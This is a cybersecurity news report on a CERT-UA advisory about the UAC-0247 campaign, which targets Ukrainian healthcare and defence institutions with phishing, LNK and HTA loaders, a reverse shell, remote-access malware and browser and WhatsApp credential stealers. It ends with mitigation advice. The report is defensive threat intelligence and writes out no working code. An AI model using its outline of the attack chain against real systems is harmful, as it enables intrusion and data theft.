## UAC-0247 Targets Ukrainian Entities with Data-Stealing Malware The **Computer Emergencies Response Team of Ukraine (CERT-UA)** has disclosed a new campaign targeting Ukrainian government and municipal healthcare institutions, including clinics and emergency hospitals. The attacks deliver malware designed to steal sensitive data from Chromium-based web browsers and **WhatsApp**. ### Campaign Details The malicious activity, observed between March and April 2026, has been attributed to a threat cluster dubbed **UAC-0247**. The origins of this campaign are currently unknown. According to **CERT-UA**, the attack begins with an email claiming to offer humanitarian aid. Recipients are urged to click a link that redirects to either a legitimate website compromised via a cross-site scripting (XSS) vulnerability or a fake site created using artificial intelligence (AI) tools. Regardless of the site, the goal is to download and execute a Windows Shortcut (LNK) file. This file then executes a remote HTML Application (HTA) using the native Windows utility, `mshta.exe`. The HTA file displays a decoy form to distract the victim while fetching a binary that injects shellcode into a legitimate process, such as `runtimeBroker.exe`. "At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with full support for code and data sections, import of functions from dynamic libraries, and relocation), and the final payload is additionally compressed and encrypted," **CERT-UA** said. One of the stagers is a tool called TCP reverse shell or its equivalent, tracked as **RAVENSHELL**, which establishes a TCP connection with a management server to receive commands for execution on the host using `cmd.exe`. Also downloaded to the infected machine is the **AGINGFLY** malware family and a **PowerShell** script called **SILENTLOOP**. **SILENTLOOP** includes functions to execute commands, auto-update configuration, and obtain the current IP address of the management server from a **Telegram** channel, with fallback mechanisms for determining the command-and-control (C2) address. Developed in C#, **AGINGFLY** is designed for remote control of compromised systems. It communicates with a C2 server using WebSockets to fetch commands that allow it to run commands, launch a keylogger, download files, and run additional payloads.  ### Data Exfiltration and Tools An investigation of about a dozen incidents revealed that these attacks facilitate reconnaissance, lateral movement, and the theft of credentials and other sensitive data from **WhatsApp** and Chromium-based browsers. This is achieved by deploying various open-source tools, including: * **ChromElevator**: A program designed to bypass Chromium's app-bound encryption (ABE) protections and harvest cookies and saved passwords. * **ZAPiXDESK**: A forensic extraction tool to decrypt local databases for **WhatsApp** Web. * **RustScan**: A network scanner. * **Ligolo-Ng**: A lightweight utility to establish tunnels from reverse TCP/TLS connections. * **Chisel**: A tool for tunneling network traffic over TCP/UDP. * **XMRig**: A cryptocurrency miner. ### Targeting of Ukrainian Defense Forces The agency also found evidence suggesting that representatives of the Defense Forces of Ukraine may have been targeted as part of the campaign. This is based on the distribution of malicious ZIP archives via **Signal** designed to drop **AGINGFLY** using the DLL side-loading technique. ### Mitigation To mitigate the risk associated with this threat and minimize the attack surface, it is recommended to restrict the execution of LNK, HTA, and JS files, along with legitimate utilities such as `mshta.exe`, `powershell.exe`, and `wscript.exe`.